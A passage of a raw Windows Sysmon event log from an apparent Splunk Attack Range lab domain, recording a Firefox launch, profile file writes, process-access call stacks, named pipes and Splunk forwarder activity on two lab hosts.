07:58:26.292{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104924Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.292{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104923Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.292{58E9C193-AE68-615A-C800-00000000FC01}45485704C:\Windows\Explorer.EXE{58E9C193-B422-615A-0502-00000000FC01}5660C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\windows.storage.dll+ad62a|C:\Windows\System32\windows.storage.dll+ad3e2|C:\Windows\System32\SHELL32.dll+3f8bd|C:\Windows\System32\SHELL32.dll+3e456|C:\Windows\System32\SHELL32.dll+801d1|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\System32\windows.storage.dll+10932|C:\Windows\System32\windows.storage.dll+10629|C:\Windows\System32\windows.storage.dll+104ff|C:\Windows\System32\SHELL32.dll+80257|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\System32\SHLWAPI.dll+e1f7 154100x8000000000000000104922Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:26.280{58E9C193-B422-615A-0502-00000000FC01}5660C:\Program Files\Mozilla Firefox\firefox.exe92.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=DBDB3EFACC3D9039A4F5703662099178,SHA256=534A44A08893AFBE78E04B4CFF80BD00BFC40562A923E8AF38E240227A643FFB,IMPHASH=AECE7B7E776840D7A7255A31B309B7E4{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x8000000000000000104946Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:27.683{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8DE75BF22B2730447A9BD5E7D441286,SHA256=6858314DBE416F8D96AAD06F88DF63D4BE1634C7E54D2175B67B68BE4098A7AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082787Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:27.745{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86C18E408E2C187978016F3EF7DE8C8C,SHA256=CEFC7CABED4C0096F1D8E45048337E976797CB98E72DD42E38B3B675A119572B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104945Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:27.292{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E8CAAF1CB78D4EB2704F8E1D2760B25,SHA256=E86E399B5B2C2A8A19ADCF7CD7A42F7152ADAE96DBE5228A26423818E0EB163F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104954Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:27.408{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51737-false10.0.1.12-8000- 23542300x8000000000000000104953Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:28.902{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cookies.sqlite-journalMD5=F9F24091CF08696E670DF0E299FB23C1,SHA256=02A73BB833C0A0511F00081959582DBBECA12B50A475A10DF17BCA59F87EEC19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104952Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:28.761{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\permissions.sqlite-journalMD5=A3A378459A3F4A674FEDD8FB1D62DC1F,SHA256=EFF0553A9B8A84489BC0D7F58B519499E7B8074DCC741E6D112DE6E20F006E70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104951Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:28.746{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\permissions.sqlite-journalMD5=352235BB926D2E459255FEBF03B4720C,SHA256=3C7F2FF852B9B615FEA5DE6AC4E2FDF76B81BF1BCE891E4A17A24F729DD94582,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104950Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:28.746{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cookies.sqlite-journalMD5=5D01AF1D744EFC2B589B645ABF904A7E,SHA256=8BCA3676ACC10906638A74E6FD8D738C1D155BCAAB3FDE853E610712EE88D981,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104949Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:28.730{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\permissions.sqlite-journalMD5=6E1A0EF4C6FAFB1C87122853C3905FFD,SHA256=C3149BE6293967BE4F6C94CF398211D1D554CD742E03852BCC562AC16E59B735,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104948Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:28.730{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cookies.sqlite-journalMD5=A945EE27780349E2C686B1CB2EB6DC49,SHA256=8D473E0D52B1EF9C0F0D11B39EDA14F382F22DCA6E5E618763C371AF2B82C4CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104947Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:28.683{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC83920D5D2E7A55D194BE6E77A3583C,SHA256=E10AA35EDD2A0F3EA28B50C948CA35156F5CD9EC9ED4F5D8F3D9CB17C6694237,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082788Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:28.839{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC953F8D9FD78E3CCE884644C8A086FF,SHA256=7626D8A45374214E9E709BE606A4C3084BB4BFCB156228E392A5B47A1F097EB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082790Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:29.932{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B1C32DA65BB5B5332716870A23CE6D9,SHA256=1D9AA1DEF22C929C35C235637E5EBCA060B969D4C402FA09D8752726739708D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104994Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.824{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-walMD5=ABCF8CCBC890D1D21ADEDF8EFFAC478F,SHA256=60BAA06DF7D97FD9F1BC04E3FE6763FA635FD34FE224A928117EB475C814F094,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104993Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.824{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmMD5=C871F3C6164B595283031F103798C8E4,SHA256=230C03BEFB666929EAA76B34CB935F2ABBC7B529B195932C9DC4CDC08A7859A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104992Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.808{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-journalMD5=8C9D16599FC5C53F9A273551EB8C9F2F,SHA256=837EE9F6241E2966769AEAA19820332332BEEAF5C2F9398296EFDBD9D85EBD64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104991Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.792{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-journalMD5=AC7A1F5A1F32F302B872B6E042A88E68,SHA256=63FB177D0D463563E605E11BE01DD86F2922D7DC75F8CADEF244ED99EA8B18A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104990Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.777{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=E0845AEAD071861704657497C2FF761D,SHA256=4C41E0CBF70074E7782EE76619B5E3CB56B687AAB550EA8C194CB6858C226E2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104989Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.761{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=D6C6A79D9B1ADE67003A5700C2C44399,SHA256=9D8DF82690677070A5F2DEE1DC38F9AC28022EBA431815FECA55D5C4BC2EF06F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104988Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.745{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-journalMD5=C97B34BC681AAB4A02E01A554CFDB8CA,SHA256=0017DD9C43958CE2B45C6622B160E1A7297DFC74E8829285D218ED838A4F9EFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104987Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.730{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-journalMD5=EF7CC1A5E0974C34B29C1669642C0BA5,SHA256=BC3F92AC55A7B15CB580EFC592B2CB5A20A31D2ECFCA29366B35C138BFCD0833,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104986Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.714{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage.sqlite-journalMD5=5D3AD430BA3218EC0D50CF42B60F8507,SHA256=B8AB3AEC0A2F39911764050664B0FDC35F390F94E280ED5DA98C6638F913EAA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104985Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.699{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage.sqlite-journalMD5=512E31E243D65567DC1AC01B581AB6CF,SHA256=7F6336DFDCD615F7617090C227FB96503D4FC448FA9BC49A799D58CFD785696D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104984Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.683{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\ls-archive.sqlite-journalMD5=99D3E7170CF93FE036D98D717C95B98A,SHA256=82C5BF57C78F91835BC44D39C14B5AC21B76B21C00C6128C58F8FED8699C6640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104983Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.667{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\ls-archive.sqlite-journalMD5=F56518A3D5FE9E97BCEBCE753BFB0E6A,SHA256=5377FB547F3E5DF8719B9BAC7968FA12CEA8B7798A1498141FF6607D8692E008,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104982Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.652{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\ls-archive.sqlite-journalMD5=7AC4B0BB4D5961A78812801BC87234E2,SHA256=5985477242D11F58A3BE3C017284AB0ED6332D0C8188F9660D2E5854E7EAEA23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104981Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.637{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\ls-archive.sqlite-journalMD5=29B09263E944004AC7FA582ACDDEA010,SHA256=F16D8965BF19073A6C17CCDDF3C1070F4FDDDFA909C72BC482369EB3979A4844,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104980Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.620{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\times.jsonMD5=AC2D37BC8A5D436D9154737D836CF02C,SHA256=A92F3534C7349BE9409A11E8C48F0CC37494F899E1A956043B9458C715FB6F75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104979Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.620{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage.sqlite-journalMD5=EBAE893FFBBA8AAF0FDB2DCA682DF2ED,SHA256=D85D5E4637514169326B34AB38CFE6C522A383A6A04B2CC217D7F1872A61E75A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104978Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.605{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104977Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.449{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104976Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.449{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104975Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.449{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000104974Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:29.449{58E9C193-B425-615A-0702-00000000FC01}5268\chrome.5552.0.214678585C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000104973Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.433{58E9C193-B422-615A-0602-00000000FC01}55524224C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+13527b|C:\Program Files\Mozilla Firefox\xul.dll+12239ed|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000104972Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:29.433{58E9C193-B425-615A-0702-00000000FC01}5268\gecko-crash-server-pipe.5552C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000104971Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.308{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104970Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.292{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104969Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.277{58E9C193-B422-615A-0602-00000000FC01}55525064C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+a0942f|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+166d71b|C:\Program Files\Mozilla Firefox\xul.dll+19cd045|C:\Program Files\Mozilla Firefox\xul.dll+13c95|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+13378|C:\Program Files\Mozilla Firefox\xul.dll+9f2211|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104968Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.277{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104967Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 